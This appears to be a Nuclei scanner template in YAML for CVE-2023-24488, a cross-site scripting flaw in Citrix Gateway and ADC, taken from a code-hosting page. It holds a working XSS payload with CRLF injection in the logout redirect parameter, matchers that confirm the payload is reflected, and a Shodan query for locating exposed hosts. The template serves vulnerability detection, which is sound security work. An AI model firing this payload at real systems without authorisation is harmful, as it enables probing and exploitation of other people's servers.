35 lines
1.3 KiB
YAML
35 lines
1.3 KiB
YAML
|
id: CVE-2023-24488
|
||
|
|
||
|
info:
|
||
|
name: Citrix Gateway and Citrix ADC - Cross-Site Scripting
|
||
|
author: johnk3r
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
|
||
|
reference:
|
||
|
- https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488
|
||
|
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24488
|
||
|
- https://twitter.com/infosec_au/status/1674786106381070342
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cve-id: CVE-2023-24488
|
||
|
cwe-id: CWE-79
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
shodan-query: title:"Citrix Gateway"
|
||
|
tags: cve,cve2023,citrix,xss,adc
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||
|
- 'contains(to_lower(body), "content-type: text/html")'
|
||
|
- 'status_code == 302'
|
||
|
condition: and
|